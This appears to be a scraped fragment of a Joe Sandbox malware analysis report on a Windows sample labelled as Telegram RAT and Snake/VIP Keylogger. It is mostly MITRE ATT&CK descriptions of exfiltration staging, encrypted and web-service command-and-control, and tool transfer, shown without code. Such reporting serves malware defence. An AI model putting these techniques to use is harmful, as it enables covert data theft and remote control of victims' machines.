Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report x8M2g1Xxhz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
x8M2g1Xxhz.exe

Function 004019F0 Relevance: 111.0, APIs: 14, Strings: 49, Instructions: 766
comCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre